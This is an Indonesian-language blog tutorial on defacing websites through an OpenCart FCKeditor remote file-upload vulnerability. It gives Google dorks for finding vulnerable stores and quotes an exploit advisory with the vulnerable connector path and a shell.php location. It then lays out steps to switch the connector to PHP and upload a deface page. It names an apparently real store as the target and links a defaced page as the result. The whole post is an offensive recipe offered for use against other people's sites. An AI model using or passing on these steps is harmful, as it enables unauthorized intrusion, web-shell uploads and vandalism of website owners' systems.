kali ini saya mau berbagi cara deface website dengan mudah dan simpel
dan ga repot kok. sebenarnya ini bug saya kuasai sejak saya smp kelas 1,
dan itu di google banyak bgt web yg masih ada bug beginian. kalo
sekarang..? tau dah, kalo lagi hoki pasti dapet :p
Oke, langsung aja nih caranya
Seperti biasa nyarinya lewat paman google.
( Dorknya copy ke search engine google )
( Dorknya copy ke search engine google )
Dork nya :
SUPPORT BY OPENCART
atau
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
Klo pengen smuanya, site nya ilangin jadi gini aja Powered By OpenCart
SUPPORT BY OPENCART
atau
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
Klo pengen smuanya, site nya ilangin jadi gini aja Powered By OpenCart
Detail exploitnya adalah:
==========================================Opencart remote file Upload Vulnerability==========================================#Exploit Title: Opencart remote file uploade#Author: Net.Edit0r#Email: blazevbs@hackermail.com ~ Black.Hat.tm@Gmail.com#Google dork: [inurl:Powered By OpenCart#Software Link: http://www.opencart.com/index.php?route=download/download#Platform :linux/php######################################Iranian HackerZ##################################### http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html# Example site: http://server# Select the "File Upload" To use = php# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php# OR# http://server/shell.php######################################Demo Example#####################################Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html##Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html###########################################################################################Spical Thanks To >>ALL BAMBANGLICIOUS FAMILY ~########################################## End ##########################################
Langsung ke caranya,
Jika kamu sudah mendapatkan target nya
Jika kamu sudah mendapatkan target nya
Contoh Target: :http://chinalacewigstore.com/store.
Klo udah dapet targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Jadinya kaya gini:http://chinalacewigstore.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Klo ketemu yang kya gini :http://chinalacewigstore.com/store kamu inject di belakang /store/ nya..
Klo ketemu yang kya gini :http://chinalacewigstore.com/store kamu inject di belakang /store/ nya..
Jangan lupa connector waktu uploadnya di ganti jadi PHP
Lalu kamu upload deh file defacenya, jika berhasil maka ada bacaan alert seperti ini “file uploaded with no errors”
Lalu kamu upload deh file defacenya, jika berhasil maka ada bacaan alert seperti ini “file uploaded with no errors”
Untuk melihat apakan berhasil di upload atau tidak kamu ke “Get Folders and Files” dan lihat hasilnya… 
Jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
Contoh hasil deface we nih http://chinalacewigstore.com/merdeka.html
Gampang kan ?
Selamat mencoba yaa… 
0 komentar:
Posting Komentar